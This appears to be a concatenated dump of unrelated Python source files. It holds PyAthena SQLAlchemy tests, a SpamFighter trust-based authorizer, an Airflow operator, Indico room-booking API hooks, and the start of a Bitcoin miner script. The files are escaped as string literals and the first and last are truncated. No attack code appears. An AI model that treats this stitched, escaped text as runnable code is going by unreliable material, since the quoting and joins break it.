self.assertIsInstance(one_row_complex.c.col_tinyint.type, INTEGER)\n self.assertIsInstance(one_row_complex.c.col_smallint.type, INTEGER)\n self.assertIsInstance(one_row_complex.c.col_int.type, INTEGER)\n self.assertIsInstance(one_row_complex.c.col_bigint.type, BIGINT)\n self.assertIsInstance(one_row_complex.c.col_float.type, FLOAT)\n self.assertIsInstance(one_row_complex.c.col_double.type, FLOAT)\n self.assertIsInstance(one_row_complex.c.col_string.type, type(STRINGTYPE))\n self.assertIsInstance(one_row_complex.c.col_timestamp.type, TIMESTAMP)\n self.assertIsInstance(one_row_complex.c.col_date.type, DATE)\n self.assertIsInstance(one_row_complex.c.col_binary.type, BINARY)\n self.assertIsInstance(one_row_complex.c.col_array.type, type(STRINGTYPE))\n self.assertIsInstance(one_row_complex.c.col_map.type, type(STRINGTYPE))\n self.assertIsInstance(one_row_complex.c.col_struct.type, type(STRINGTYPE))\n self.assertIsInstance(one_row_complex.c.col_decimal.type, DECIMAL)\n\n @with_engine()\n def test_reserved_words(self, engine, conn):\n """"""Presto uses double quotes, not backticks""""""\n fake_table = Table(\n ""select"", MetaData(bind=engine), Column(""current_timestamp"", STRINGTYPE)\n )\n query = str(fake_table.select(fake_table.c.current_timestamp == ""a""))\n self.assertIn(\'""select""\', query)\n self.assertIn(\'""current_timestamp""\', query)\n self.assertNotIn(""`select`"", query)\n self.assertNotIn(""`current_timestamp`"", query)\n\n @with_engine()\n def test_retry_if_data_catalog_exception(self, engine, conn):\n dialect = engine.dialect\n exc = OperationalError(\n """", None, ""Database does_not_exist not found. Please check your query.""\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""does_not_exist"", ""does_not_exist""\n )\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""does_not_exist"", ""this_does_not_exist""\n )\n )\n self.assertTrue(\n dialect._retry_if_data_catalog_exception(\n exc, ""this_does_not_exist"", ""does_not_exist""\n )\n )\n self.assertTrue(\n dialect._retry_if_data_catalog_exception(\n exc, ""this_does_not_exist"", ""this_does_not_exist""\n )\n )\n\n exc = OperationalError(\n """", None, ""Namespace does_not_exist not found. Please check your query.""\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""does_not_exist"", ""does_not_exist""\n )\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""does_not_exist"", ""this_does_not_exist""\n )\n )\n self.assertTrue(\n dialect._retry_if_data_catalog_exception(\n exc, ""this_does_not_exist"", ""does_not_exist""\n )\n )\n self.assertTrue(\n dialect._retry_if_data_catalog_exception(\n exc, ""this_does_not_exist"", ""this_does_not_exist""\n )\n )\n\n exc = OperationalError(\n """", None, ""Table does_not_exist not found. Please check your query.""\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""does_not_exist"", ""does_not_exist""\n )\n )\n self.assertTrue(\n dialect._retry_if_data_catalog_exception(\n exc, ""does_not_exist"", ""this_does_not_exist""\n )\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""this_does_not_exist"", ""does_not_exist""\n )\n )\n self.assertTrue(\n dialect._retry_if_data_catalog_exception(\n exc, ""this_does_not_exist"", ""this_does_not_exist""\n )\n )\n\n exc = OperationalError("""", None, ""foobar."")\n self.assertTrue(\n dialect._retry_if_data_catalog_exception(exc, ""foobar"", ""foobar"")\n )\n\n exc = ProgrammingError(\n """", None, ""Database does_not_exist not found. Please check your query.""\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""does_not_exist"", ""does_not_exist""\n )\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""does_not_exist"", ""this_does_not_exist""\n )\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""this_does_not_exist"", ""does_not_exist""\n )\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""this_does_not_exist"", ""this_does_not_exist""\n )\n )\n\n @with_engine()\n def test_get_column_type(self, engine, conn):\n dialect = engine.dialect\n self.assertEqual(dialect._get_column_type(""boolean""), ""boolean"")\n self.assertEqual(dialect._get_column_type(""tinyint""), ""tinyint"")\n self.assertEqual(dialect._get_column_type(""smallint""), ""smallint"")\n self.assertEqual(dialect._get_column_type(""integer""), ""integer"")\n self.assertEqual(dialect._get_column_type(""bigint""), ""bigint"")\n self.assertEqual(dialect._get_column_type(""real""), ""real"")\n self.assertEqual(dialect._get_column_type(""double""), ""double"")\n self.assertEqual(dialect._get_column_type(""varchar""), ""varchar"")\n self.assertEqual(dialect._get_column_type(""timestamp""), ""timestamp"")\n self.assertEqual(dialect._get_column_type(""date""), ""date"")\n self.assertEqual(dialect._get_column_type(""varbinary""), ""varbinary"")\n self.assertEqual(dialect._get_column_type(""array(integer)""), ""array"")\n self.assertEqual(dialect._get_column_type(""map(integer, integer)""), ""map"")\n self.assertEqual(dialect._get_column_type(""row(a integer, b integer)""), ""row"")\n self.assertEqual(dialect._get_column_type(""decimal(10,1)""), ""decimal"")\n\n @with_engine()\n def test_contain_percents_character_query(self, engine, conn):\n select = sqlalchemy.sql.text(\n """"""\n SELECT date_parse(\'20191030\', \'%Y%m%d\')\n """"""\n )\n table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte()\n\n query = sqlalchemy.select([""*""]).select_from(table_expression)\n result = engine.execute(query)\n self.assertEqual(result.fetchall(), [(datetime(2019, 10, 30),)])\n\n query_with_limit = (\n sqlalchemy.sql.select([""*""]).select_from(table_expression).limit(1)\n )\n result_with_limit = engine.execute(query_with_limit)\n self.assertEqual(result_with_limit.fetchall(), [(datetime(2019, 10, 30),)])\n\n @with_engine()\n def test_query_with_parameter(self, engine, conn):\n select = sqlalchemy.sql.text(\n """"""\n SELECT :word\n """"""\n )\n table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte()\n\n query = sqlalchemy.select([""*""]).select_from(table_expression)\n result = engine.execute(query, word=""cat"")\n self.assertEqual(result.fetchall(), [(""cat"",)])\n\n query_with_limit = (\n sqlalchemy.select([""*""]).select_from(table_expression).limit(1)\n )\n result_with_limit = engine.execute(query_with_limit, word=""cat"")\n self.assertEqual(result_with_limit.fetchall(), [(""cat"",)])\n\n @with_engine()\n def test_contain_percents_character_query_with_parameter(self, engine, conn):\n select1 = sqlalchemy.sql.text(\n """"""\n SELECT date_parse(\'20191030\', \'%Y%m%d\'), :word\n """"""\n )\n table_expression1 = sqlalchemy.sql.selectable.TextAsFrom(select1, []).cte()\n\n query1 = sqlalchemy.select([""*""]).select_from(table_expression1)\n result1 = engine.execute(query1, word=""cat"")\n self.assertEqual(result1.fetchall(), [(datetime(2019, 10, 30), ""cat"")])\n\n query_with_limit1 = (\n sqlalchemy.select([""*""]).select_from(table_expression1).limit(1)\n )\n result_with_limit1 = engine.execute(query_with_limit1, word=""cat"")\n self.assertEqual(\n result_with_limit1.fetchall(), [(datetime(2019, 10, 30), ""cat"")]\n )\n\n select2 = sqlalchemy.sql.text(\n """"""\n SELECT col_string, :param FROM one_row_complex\n WHERE col_string LIKE \'a%\' OR col_string LIKE :param\n """"""\n )\n table_expression2 = sqlalchemy.sql.selectable.TextAsFrom(select2, []).cte()\n\n query2 = sqlalchemy.select([""*""]).select_from(table_expression2)\n result2 = engine.execute(query2, param=""b%"")\n self.assertEqual(result2.fetchall(), [(""a string"", ""b%"")])\n\n query_with_limit2 = (\n sqlalchemy.select([""*""]).select_from(table_expression2).limit(1)\n )\n result_with_limit2 = engine.execute(query_with_limit2, param=""b%"")\n self.assertEqual(result_with_limit2.fetchall(), [(""a string"", ""b%"")])\n\n @with_engine()\n def test_nan_checks(self, engine, conn):\n dialect = engine.dialect\n self.assertFalse(dialect._is_nan(""string""))\n self.assertFalse(dialect._is_nan(1))\n self.assertTrue(dialect._is_nan(float(""nan"")))\n\n @with_engine()\n def test_to_sql(self, engine, conn):\n # TODO pyathena.error.OperationalError: SYNTAX_ERROR: line 1:305:\n # Column \'foobar\' cannot be resolved.\n # def _format_bytes(formatter, escaper, val):\n # return val.decode()\n table_name = ""to_sql_{0}"".format(str(uuid.uuid4()).replace(""-"", """"))\n df = pd.DataFrame(\n {\n ""col_int"": np.int32([1]),\n ""col_bigint"": np.int64([12345]),\n ""col_float"": np.float32([1.0]),\n ""col_double"": np.float64([1.2345]),\n ""col_string"": [""a""],\n ""col_boolean"": np.bool_([True]),\n ""col_timestamp"": [datetime(2020, 1, 1, 0, 0, 0)],\n ""col_date"": [date(2020, 12, 31)],\n # ""col_binary"": ""foobar"".encode(),\n }\n )\n # Explicitly specify column order\n df = df[\n [\n ""col_int"",\n ""col_bigint"",\n ""col_float"",\n ""col_double"",\n ""col_string"",\n ""col_boolean"",\n ""col_timestamp"",\n ""col_date"",\n # ""col_binary"",\n ]\n ]\n df.to_sql(\n table_name,\n engine,\n schema=SCHEMA,\n index=False,\n if_exists=""replace"",\n method=""multi"",\n )\n\n table = Table(table_name, MetaData(bind=engine), autoload=True)\n self.assertEqual(\n table.select().execute().fetchall(),\n [\n (\n 1,\n 12345,\n 1.0,\n 1.2345,\n ""a"",\n True,\n datetime(2020, 1, 1, 0, 0, 0),\n date(2020, 12, 31),\n # ""foobar"".encode(),\n )\n ],\n )\n\n @with_engine(verify=""false"")\n def test_conn_str_verify(self, engine, conn):\n kwargs = conn.connection._kwargs\n self.assertFalse(kwargs[""verify""])\n\n @with_engine(duration_seconds=""1800"")\n def test_conn_str_duration_seconds(self, engine, conn):\n kwargs = conn.connection._kwargs\n self.assertEqual(kwargs[""duration_seconds""], 1800)\n\n @with_engine(poll_interval=""5"")\n def test_conn_str_poll_interval(self, engine, conn):\n self.assertEqual(conn.connection.poll_interval, 5)\n\n @with_engine(kill_on_interrupt=""false"")\n def test_conn_str_kill_on_interrupt(self, engine, conn):\n self.assertFalse(conn.connection.kill_on_interrupt)\n', '# -*- coding: utf-8 -*-\n#\n# SpamFighter, Copyright 2008, 2009 NetStream LLC (http://netstream.ru/, dummy@email.com)\n#\n# This file is part of SpamFighter.\n#\n# SpamFighter is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# SpamFighter is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with SpamFighter. If not, see .\n#\n\n""""""\nМодуль авторизации партнеров без логинов/паролей (на доверии).\n""""""\n\nfrom zope.interface import implements\nfrom twisted.internet import defer\n\nfrom spamfighter.interfaces import IPartner, IPartnerAuthorizer\nfrom spamfighter.core.partner import PartnerAuthorizationFailedError\nfrom spamfighter.core.domain import getDefaultDomain, BaseDomain\nfrom spamfighter.plugin import loadPlugin, IDefaultDomainProvider\nfrom spamfighter.utils import config\n\nclass NullPartner(object):\n """"""\n Партнер, авторизованный без логина/пароля (на доверии).\n\n @ivar domain: корневой домен партнера\n @type domain: L{BaseDomain}\n """"""\n implements(IPartner)\n\n def __init__(self):\n """"""\n Конструктор.\n """"""\n domainProvider = loadPlugin(IDefaultDomainProvider, config.plugins.domain.null_partner_domain_provider)\n self.domain = domainProvider.getDefaultDomain()\n\n def rootDomain(self):\n """"""\n Получить корневой домен партнера.\n\n @return: Deferred, корневой домен (L{IDomain})\n @rtype: C{twisted.internet.defer.Deferred} \n """"""\n return defer.succeed(self.domain)\n\nclass NullPartnerAuthorizer(object):\n """"""\n Провайдер авторизации партнеров без логина/пароля (на доверии).\n\n В этой ситуации доступ к СпамоБорцу ограничен с помощью других средств\n (HTTP-proxy, firewall).\n\n @ivar partner: единственный партнер, который обеспечивает весь доступ\n @type partner: L{NullPartner}\n """"""\n implements(IPartnerAuthorizer)\n\n def __init__(self):\n """"""\n Конструктор.\n """"""\n self.partner = NullPartner()\n\n def authorize(self, partner_info):\n """"""\n Выполнить авторизацию партнера.\n\n @param partner_info: информация о партнере\n @return: Deferred, партнер (L{IPartner})\n @rtype: C{twisted.internet.defer.Deferred} \n """"""\n if partner_info is not None:\n return defer.fail(PartnerAuthorizationFailedError())\n\n return defer.succeed(self.partner)\n', '""""""\n.. module:: operators.dive_operator\n :synopsis: DivePythonOperator for use with TaskRunner\n\n.. moduleauthor:: Laura Lorenz dummy@email.com\n.. moduleauthor:: Miriam Sexton dummy@email.com\n""""""\n\nfrom airflow.operators import PythonOperator\n\nfrom .dive_operator import DiveOperator\n\n\nclass DivePythonOperator(DiveOperator, PythonOperator):\n """"""\n Python operator that can send along data dependencies to its callable.\n Generates the callable by initializing its python object and calling its method.\n """"""\n\n def __init__(self, python_object, python_method=""run"", *args, **kwargs):\n self.python_object = python_object\n self.python_method = python_method\n kwargs[\'python_callable\'] = None\n\n super(DivePythonOperator, self).__init__(*args, **kwargs)\n\n def pre_execute(self, context):\n context.update(self.op_kwargs)\n context.update({""data_dependencies"": self.data_dependencies})\n instantiated_object = self.python_object(context)\n self.python_callable = getattr(instantiated_object, self.python_method)\n', '# -*- coding: utf-8 -*-\n##\n##\n## This file is part of Indico\n## Copyright (C) 2002 - 2013 European Organization for Nuclear Research (CERN)\n##\n## Indico is free software: you can redistribute it and/or\n## modify it under the terms of the GNU General Public License as\n## published by the Free Software Foundation, either version 3 of the\n## License, or (at your option) any later version.\n##\n## Indico is distributed in the hope that it will be useful, but\n## WITHOUT ANY WARRANTY; without even the implied warranty of\n## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n## GNU General Public License for more details.\n##\n## You should have received a copy of the GNU General Public License\n## along with Indico. If not, see .\n\nfrom datetime import datetime\n\nimport icalendar\nimport pytz\nfrom babel.dates import get_timezone\nfrom sqlalchemy import Time, Date\nfrom sqlalchemy.sql import cast\nfrom werkzeug.datastructures import OrderedMultiDict, MultiDict\n\nfrom indico.core.config import Config\nfrom indico.core.db import db\nfrom indico.core.errors import IndicoError\nfrom indico.modules.rb.utils import rb_check_user_access\nfrom indico.modules.rb.models.reservations import Reservation, RepeatMapping, RepeatFrequency, ConflictingOccurrences\nfrom indico.modules.rb.models.locations import Location\nfrom indico.modules.rb.models.rooms import Room\nfrom indico.util.date_time import utc_to_server\nfrom indico.web.http_api import HTTPAPIHook\nfrom indico.web.http_api.metadata import ical\nfrom indico.web.http_api.responses import HTTPAPIError\nfrom indico.web.http_api.util import get_query_parameter\nfrom MaKaC.authentication import AuthenticatorMgr\nfrom MaKaC.common.info import HelperMaKaCInfo\n\n\nclass RoomBookingHookBase(HTTPAPIHook):\n GUEST_ALLOWED = False\n\n def _getParams(self):\n super(RoomBookingHookBase, self)._getParams()\n self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None\n self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None\n self._occurrences = _yesno(get_query_parameter(self._queryParams, [\'occ\', \'occurrences\'], \'no\'))\n\n def _hasAccess(self, aw):\n return Config.getInstance().getIsRoomBookingActive() and rb_check_user_access(aw.getUser())\n\n\n@HTTPAPIHook.register\nclass RoomHook(RoomBookingHookBase):\n # e.g. /export/room/CERN/23.json\n TYPES = (\'room\',)\n RE = r\'(?P[\\w\\s]+)/(?P\\w+(?:-[\\w\\s]+)*)\'\n DEFAULT_DETAIL = \'rooms\'\n MAX_RECORDS = {\n \'rooms\': 500,\n \'reservations\': 100\n }\n VALID_FORMATS = (\'json\', \'jsonp\', \'xml\')\n\n def _getParams(self):\n super(RoomHook, self)._getParams()\n self._location = self._pathParams[\'location\']\n self._ids = map(int, self._pathParams[\'idlist\'].split(\'-\'))\n if self._detail not in {\'rooms\', \'reservations\'}:\n raise HTTPAPIError(\'Invalid detail level: %s\' % self._detail, 400)\n\n def export_room(self, aw):\n loc = Location.find_first(name=self._location)\n if loc is None:\n return\n\n # Retrieve rooms\n rooms_data = list(Room.get_with_data(\'vc_equipment\', \'non_vc_equipment\',\n filters=[Room.id.in_(self._ids), Room.location_id == loc.id]))\n\n # Retrieve reservations\n reservations = None\n if self._detail == \'reservations\':\n reservations = OrderedMultiDict(_export_reservations(self, True, False, [\n Reservation.room_id.in_(x[\'room\'].id for x in rooms_data)\n ]))\n\n for result in rooms_data:\n yield _serializable_room(result, reservations)\n\n\n@HTTPAPIHook.register\nclass RoomNameHook(RoomBookingHookBase):\n # e.g. /export/roomName/CERN/pump.json\n GUEST_ALLOWED = True\n TYPES = (\'roomName\', )\n RE = r\'(?P[\\w\\s]+)/(?P[\\w\\s\\-]+)\'\n DEFAULT_DETAIL = \'rooms\'\n MAX_RECORDS = {\n \'rooms\': 500\n }\n VALID_FORMATS = (\'json\', \'jsonp\', \'xml\')\n\n def _getParams(self):\n super(RoomNameHook, self)._getParams()\n self._location = self._pathParams[\'location\']\n self._room_name = self._pathParams[\'room_name\']\n\n def _hasAccess(self, aw):\n # Access to RB data (no reservations) is public\n return Config.getInstance().getIsRoomBookingActive()\n\n def export_roomName(self, aw):\n loc = Location.find_first(name=self._location)\n if loc is None:\n return\n\n search_str = \'%{}%\'.format(self._room_name)\n rooms_data = Room.get_with_data(\'vc_equipment\', \'non_vc_equipment\',\n filters=[Room.location_id == loc.id, Room.name.ilike(search_str)])\n for result in rooms_data:\n yield _serializable_room(result)\n\n\n@HTTPAPIHook.register\nclass ReservationHook(RoomBookingHookBase):\n # e.g. /export/reservation/CERN.json\n TYPES = (\'reservation\', )\n RE = r\'(?P[\\w\\s]+(?:-[\\w\\s]+)*)\'\n DEFAULT_DETAIL = \'reservations\'\n MAX_RECORDS = {\n \'reservations\': 100\n }\n VALID_FORMATS = (\'json\', \'jsonp\', \'xml\', \'ics\')\n\n @property\n def serializer_args(self):\n return {\'ical_serializer\': _ical_serialize_reservation}\n\n def _getParams(self):\n super(ReservationHook, self)._getParams()\n self._locations = self._pathParams[\'loclist\'].split(\'-\')\n\n def export_reservation(self, aw):\n locations = Location.find_all(Location.name.in_(self._locations))\n if not locations:\n return\n\n for room_id, reservation in _export_reservations(self, False, True):\n yield reservation\n\n\n@HTTPAPIHook.register\nclass BookRoomHook(HTTPAPIHook):\n PREFIX = \'api\'\n TYPES = (\'roomBooking\',)\n RE = r\'bookRoom\'\n GUEST_ALLOWED = False\n VALID_FORMATS = (\'json\', \'xml\')\n COMMIT = True\n HTTP_POST = True\n\n def _getParams(self):\n super(BookRoomHook, self)._getParams()\n self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None\n self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None\n if not self._fromDT or not self._toDT or self._fromDT.date() != self._toDT.date():\n raise HTTPAPIError(\'from/to must be on the same day\')\n elif self._fromDT >= self._toDT:\n raise HTTPAPIError(\'to must be after from\')\n elif self._fromDT < datetime.now():\n raise HTTPAPIError(\'You cannot make bookings in the past\')\n\n username = get_query_parameter(self._queryParams, \'username\')\n avatars = username and filter(None, AuthenticatorMgr().getAvatarByLogin(username).itervalues())\n if not avatars:\n raise HTTPAPIError(\'Username does not exist\')\n elif len(avatars) != 1:\n raise HTTPAPIError(\'Ambiguous username ({} users found)\'.format(len(avatars)))\n avatar = avatars[0]\n\n self._params = {\n \'room_id\': get_query_parameter(self._queryParams, \'roomid\'),\n \'reason\': get_query_parameter(self._queryParams, \'reason\'),\n \'booked_for\': avatar,\n \'from\': self._fromDT,\n \'to\': self._toDT\n }\n missing = [key for key, val in self._params.iteritems() if not val]\n if missing:\n raise HTTPAPIError(\'Required params missing: {}\'.format(\', \'.join(missing)))\n self._room = Room.get(self._params[\'room_id\'])\n if not self._room:\n raise HTTPAPIError(\'A room with this ID does not exist\')\n\n def _hasAccess(self, aw):\n if not Config.getInstance().getIsRoomBookingActive() or not rb_check_user_access(aw.getUser()):\n return False\n if self._room.can_be_booked(aw.getUser()):\n return True\n elif self._room.can_be_prebooked(aw.getUser()):\n raise HTTPAPIError(\'The API only supports direct bookings but this room only allows pre-bookings.\')\n return False\n\n def api_roomBooking(self, aw):\n data = MultiDict({\n \'start_dt\': self._params[\'from\'],\n \'end_dt\': self._params[\'to\'],\n \'repeat_frequency\': RepeatFrequency.NEVER,\n \'repeat_interval\': 0,\n \'room_id\': self._room.id,\n \'booked_for_id\': self._params[\'booked_for\'].getId(),\n \'contact_email\': self._params[\'booked_for\'].getEmail(),\n \'contact_phone\': self._params[\'booked_for\'].getTelephone(),\n \'booking_reason\': self._params[\'reason\']\n })\n try:\n reservation = Reservation.create_from_data(self._room, data, aw.getUser())\n except ConflictingOccurrences:\n raise HTTPAPIError(\'Failed to create the booking due to conflicts with other bookings\')\n except IndicoError as e:\n raise HTTPAPIError(\'Failed to create the booking: {}\'.format(e))\n db.session.add(reservation)\n db.session.flush()\n return {\'reservationID\': reservation.id}\n\n\ndef _export_reservations(hook, limit_per_room, include_rooms, extra_filters=None):\n """"""Exports reservations.\n\n :param hook: The HTTPAPIHook instance\n :param limit_per_room: Should the limit/offset be applied per room\n :param include_rooms: Should reservations include room information\n """"""\n filters = list(extra_filters) if extra_filters else []\n if hook._fromDT and hook._toDT:\n filters.append(cast(Reservation.start_dt, Date) <= hook._toDT.date())\n filters.append(cast(Reservation.end_dt, Date) >= hook._fromDT.date())\n filters.append(cast(Reservation.start_dt, Time) <= hook._toDT.time())\n filters.append(cast(Reservation.end_dt, Time) >= hook._fromDT.time())\n elif hook._toDT:\n filters.append(cast(Reservation.end_dt, Date) <= hook._toDT.date())\n filters.append(cast(Reservation.end_dt, Time) <= hook._toDT.time())\n elif hook._fromDT:\n filters.append(cast(Reservation.start_dt, Date) >= hook._fromDT.date())\n filters.append(cast(Reservation.start_dt, Time) >= hook._fromDT.time())\n filters += _get_reservation_state_filter(hook._queryParams)\n occurs = [datetime.strptime(x, \'%Y-%m-%d\').date()\n for x in filter(None, get_query_parameter(hook._queryParams, [\'occurs\'], \'\').split(\',\'))]\n data = [\'vc_equipment\']\n if hook._occurrences:\n data.append(\'occurrences\')\n order = {\n \'start\': Reservation.start_dt,\n \'end\': Reservation.end_dt\n }.get(hook._orderBy, Reservation.start_dt)\n if hook._descending:\n order = order.desc()\n reservations_data = Reservation.get_with_data(*data, filters=filters, limit=hook._limit, offset=hook._offset,\n order=order, limit_per_room=limit_per_room, occurs_on=occurs)\n for result in reservations_data:\n yield result[\'reservation\'].room_id, _serializable_reservation(result, include_rooms)\n\n\ndef _serializable_room(room_data, reservations=None):\n """"""Serializable room data\n\n :param room_data: Room data\n :param reservations: MultiDict mapping for room id => reservations\n """"""\n data = room_data[\'room\'].to_serializable(\'__api_public__\')\n data[\'_type\'] = \'Room\'\n data[\'avc\'] = bool(room_data[\'vc_equipment\'])\n data[\'vcList\'] = room_data[\'vc_equipment\']\n data[\'equipment\'] = room_data[\'non_vc_equipment\']\n if reservations is not None:\n data[\'reservations\'] = reservations.getlist(room_data[\'room\'].id)\n return data\n\n\ndef _serializable_room_minimal(room):\n """"""Serializable minimal room data (inside reservations)\n\n :param room: A `Room`\n """"""\n data = room.to_serializable(\'__api_minimal_public__\')\n data[\'_type\'] = \'Room\'\n return data\n\n\ndef _serializable_reservation(reservation_data, include_room=False):\n """"""Serializable reservation (standalone or inside room)\n\n :param reservation_data: Reservation data\n :param include_room: Include minimal room information\n """"""\n reservation = reservation_data[\'reservation\']\n data = reservation.to_serializable(\'__api_public__\', converters={datetime: _add_server_tz})\n data[\'_type\'] = \'Reservation\'\n data[\'repeatability\'] = None\n if reservation.repeat_frequency:\n data[\'repeatability\'] = RepeatMapping.get_short_name(*reservation.repetition)\n data[\'vcList\'] = reservation_data[\'vc_equipment\']\n if include_room:\n data[\'room\'] = _serializable_room_minimal(reservation_data[\'reservation\'].room)\n if \'occurrences\' in reservation_data:\n data[\'occurrences\'] = [o.to_serializable(\'__api_public__\', converters={datetime: _add_server_tz})\n for o in reservation_data[\'occurrences\']]\n return data\n\n\ndef _ical_serialize_repeatability(data):\n start_dt_utc = data[\'startDT\'].astimezone(pytz.utc)\n end_dt_utc = data[\'endDT\'].astimezone(pytz.utc)\n WEEK_DAYS = \'MO TU WE TH FR SA SU\'.split()\n recur = ical.vRecur()\n recur[\'until\'] = end_dt_utc\n if data[\'repeat_frequency\'] == RepeatFrequency.DAY:\n recur[\'freq\'] = \'daily\'\n elif data[\'repeat_frequency\'] == RepeatFrequency.WEEK:\n recur[\'freq\'] = \'weekly\'\n recur[\'interval\'] = data[\'repeat_interval\']\n elif data[\'repeat_frequency\'] == RepeatFrequency.MONTH:\n recur[\'freq\'] = \'monthly\'\n recur[\'byday\'] = \'{}{}\'.format(start_dt_utc.day // 7, WEEK_DAYS[start_dt_utc.weekday()])\n return recur\n\n\ndef _ical_serialize_reservation(cal, data, now):\n start_dt_utc = data[\'startDT\'].astimezone(pytz.utc)\n end_dt_utc = datetime.combine(data[\'startDT\'].date(), data[\'endDT\'].timetz()).astimezone(pytz.utc)\n\n event = icalendar.Event()\n event.add(\'uid\', dummy@email.com\' % data[\'id\'])\n event.add(\'dtstamp\', now)\n event.add(\'dtstart\', start_dt_utc)\n event.add(\'dtend\', end_dt_utc)\n event.add(\'url\', data[\'bookingUrl\'])\n event.add(\'summary\', data[\'reason\'])\n event.add(\'location\', u\'{}: {}\'.format(data[\'location\'], data[\'room\'][\'fullName\']))\n event.add(\'description\', data[\'reason\'].decode(\'utf-8\') + \'\\n\\n\' + data[\'bookingUrl\'])\n if data[\'repeat_frequency\'] != RepeatFrequency.NEVER:\n event.add(\'rrule\', _ical_serialize_repeatability(data))\n cal.add_component(event)\n\n\ndef _add_server_tz(dt):\n if dt.tzinfo is None:\n return dt.replace(tzinfo=get_timezone(HelperMaKaCInfo.getMaKaCInfoInstance().getTimezone()))\n return dt\n\n\ndef _yesno(value):\n return value.lower() in {\'yes\', \'y\', \'1\', \'true\'}\n\n\ndef _get_reservation_state_filter(params):\n cancelled = get_query_parameter(params, [\'cxl\', \'cancelled\'])\n rejected = get_query_parameter(params, [\'rej\', \'rejected\'])\n confirmed = get_query_parameter(params, [\'confirmed\'])\n archived = get_query_parameter(params, [\'arch\', \'archived\', \'archival\'])\n repeating = get_query_parameter(params, [\'rec\', \'recurring\', \'rep\', \'repeating\'])\n avc = get_query_parameter(params, [\'avc\'])\n avc_support = get_query_parameter(params, [\'avcs\', \'avcsupport\'])\n startup_support = get_query_parameter(params, [\'sts\', \'startupsupport\'])\n booked_for = get_query_parameter(params, [\'bf\', \'bookedfor\'])\n\n filters = []\n if cancelled is not None:\n filters.append(Reservation.is_cancelled == _yesno(cancelled))\n if rejected is not None:\n filters.append(Reservation.is_rejected == _yesno(rejected))\n if confirmed is not None:\n if confirmed == \'pending\':\n filters.append(Reservation.is_pending)\n elif _yesno(confirmed):\n filters.append(Reservation.is_accepted)\n else:\n filters.append(~Reservation.is_accepted)\n filters.append(Reservation.is_rejected | Reservation.is_cancelled)\n if archived is not None:\n filters.append(Reservation.is_archived == _yesno(archived))\n if repeating is not None:\n if _yesno(repeating):\n filters.append(Reservation.repeat_frequency != 0)\n else:\n filters.append(Reservation.repeat_frequency == 0)\n if avc is not None:\n filters.append(Reservation.uses_vc == _yesno(avc))\n if avc_support is not None:\n filters.append(Reservation.needs_vc_assistance == _yesno(avc_support))\n if startup_support is not None:\n filters.append(Reservation.needs_assistance == _yesno(startup_support))\n if booked_for:\n like_str = \'%{}%\'.format(booked_for.replace(\'?\', \'_\').replace(\'*\', \'%\'))\n filters.append(Reservation.booked_for_name.ilike(like_str))\n return filters\n', '#!/usr/bin/python\n#\n# Copyright (c) 2011 The Bitcoin developers\n# Distributed under the MIT/X11 software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n#\n\nimport time\nimport json\nimport pprint\nimport hashlib\nimport struct\nimport re\nimport base64\nimport httplib\nimport sys\nfrom multiprocessing import Process\n\nERR_SLEEP = 15\nMAX_NONCE = 1000000L\n\nsettings = {}\npp = pprint.PrettyPrinter(indent=4)\n\nclass BitcoinRPC:\n\tOBJID = 1\n\n\tdef __init__(self, host, port, username, password):\n\t\tauthpair = ""%s:%s"" % (username, password)\n\t\tself.authhdr = ""Basic %s"" % (base64.b64encode(authpair))\n\t\tself.conn = httplib.HTTPConnection(host, port, False, 30)\n\tdef rpc(self, method, params=None):\n\t\tself.OBJID += 1\n\t\tobj = { \'version\' : \'1.1\',\n\t\t\t\'method\' : method,\n\t\t\t\'id\' : self.OBJID }\n\t\tif params is None:\n\t\t\tobj[\'params\'] = []\n\t\telse:\n\t\t\tobj[\'params\'] = params\n\t\tself.conn.request(\'POST\', \'/\', json.dumps(obj),\n\t\t\t{ \'Authorization\' : self.authhdr,\n\t\t\t \'Content-type\' : \'application/json\' })\n\n\t\tresp = self.conn.getresponse()\n\t\tif resp is None:\n\t\t\tprint ""JSON-RPC: no response""\n\t\t\treturn None\n\n\t\tbody = resp.read()\n\t\tresp_obj = json.loads(body)\n\t\tif resp_obj is None:\n\t\t\tprint ""JSON-RPC: cannot JSON-decode body""\n\t\t\treturn None\n\t\tif \'error\' in resp_obj and resp_obj[\'error\'] != None:\n\t\t\treturn resp_obj[\'error\']\n\t\tif \'result\' not in resp_obj:\n\t\t\tprint ""JSON-RPC: no result in object""\n\t\t\treturn None\n\n\t\treturn resp_obj[\'result\']\n\tdef getblockcount(self):\n\t\treturn self.rpc(\'getblockcount\')\n\tdef getwork(self, data=None):\n\t\treturn self.rpc(\'getwork\', data)\n\ndef uint32(x):\n\treturn x & 0xffffffffL\n\ndef bytereverse(x):\n\treturn uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) 